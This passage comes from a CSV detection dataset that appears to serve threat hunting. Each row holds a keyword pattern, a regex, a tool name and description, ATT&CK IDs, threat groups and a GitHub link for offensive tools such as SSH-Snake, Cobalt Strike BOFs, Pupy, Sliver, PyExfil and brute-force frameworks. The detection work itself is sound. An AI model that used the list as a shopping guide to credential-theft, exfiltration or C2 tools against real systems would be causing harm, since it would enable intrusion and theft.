T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*/SnaffPoint.git*",".{0,1000}\/SnaffPoint\.git.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*/Snake.nocomments.sh*",".{0,1000}\/Snake\.nocomments\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/Snake.sh*",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/sniffer.git*",".{0,1000}\/sniffer\.git.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*/sniffer-detect.nse*",".{0,1000}\/sniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-brute.nse*",".{0,1000}\/snmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-hh3c-logins.nse*",".{0,1000}\/snmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-info.nse*",".{0,1000}\/snmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-interfaces.nse*",".{0,1000}\/snmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-ios-config.nse*",".{0,1000}\/snmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-netstat.nse*",".{0,1000}\/snmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-processes.nse*",".{0,1000}\/snmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-sysdescr.nse*",".{0,1000}\/snmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-services.nse*",".{0,1000}\/snmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-shares.nse*",".{0,1000}\/snmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-software.nse*",".{0,1000}\/snmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmp-win32-users.nse*",".{0,1000}\/snmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/snmpwn.git*",".{0,1000}\/snmpwn\.git.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/snmpwn.rb*",".{0,1000}\/snmpwn\.rb.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*/SOAPHound.exe*",".{0,1000}\/SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SOAPHound.git*",".{0,1000}\/SOAPHound\.git.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SOAPHound/Program.cs*",".{0,1000}\/SOAPHound\/Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*/SocialBox.sh*",".{0,1000}\/SocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/SocialBox-Termux*",".{0,1000}\/SocialBox\-Termux.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*/SocialPwned*",".{0,1000}\/SocialPwned.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*/socks5proxy.py*",".{0,1000}\/socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/socks-auth-info.nse*",".{0,1000}\/socks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-brute.nse*",".{0,1000}\/socks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/socks-open-proxy.nse*",".{0,1000}\/socks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SpaceRunner.git*",".{0,1000}\/SpaceRunner\.git.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/SpamChannel.git*",".{0,1000}\/SpamChannel\.git.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*/spawn.git*",".{0,1000}\/spawn\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/spellbound.git*",".{0,1000}\/spellbound\.git.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellgen.py *",".{0,1000}\/spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spellstager.py *",".{0,1000}\/spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*/spider.yaml*",".{0,1000}\/spider\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/spider_plus.py*",".{0,1000}\/spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/SpiderFoot-*.log.cs*",".{0,1000}\/SpiderFoot\-.{0,1000}\.log\.cs.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderFoot.csv*",".{0,1000}\/SpiderFoot\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/spiderfoot.git*",".{0,1000}\/spiderfoot\.git.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/SpiderMate/Jatayu*",".{0,1000}\/SpiderMate\/Jatayu.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*/splunk_whisperer.git*",".{0,1000}\/splunk_whisperer\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/SplunkWhisperer2.git*",".{0,1000}\/SplunkWhisperer2\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*/spoof/dns*",".{0,1000}\/spoof\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/spoof/mdns*",".{0,1000}\/spoof\/mdns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/spoof/spoof_windows.*",".{0,1000}\/spoof\/spoof_windows\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/spoofing-office-macro.git*",".{0,1000}\/spoofing\-office\-macro\.git.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*/spoofIPs_client.py*",".{0,1000}\/spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/SpookFlare.git*",".{0,1000}\/SpookFlare\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/spooler.py*",".{0,1000}\/spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/spoolsystem/SpoolTrigger/*",".{0,1000}\/spoolsystem\/SpoolTrigger\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/spray/spray.py*",".{0,1000}\/spray\/spray\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray365*",".{0,1000}\/Spray365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*/Spray-AD.*",".{0,1000}\/Spray\-AD\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 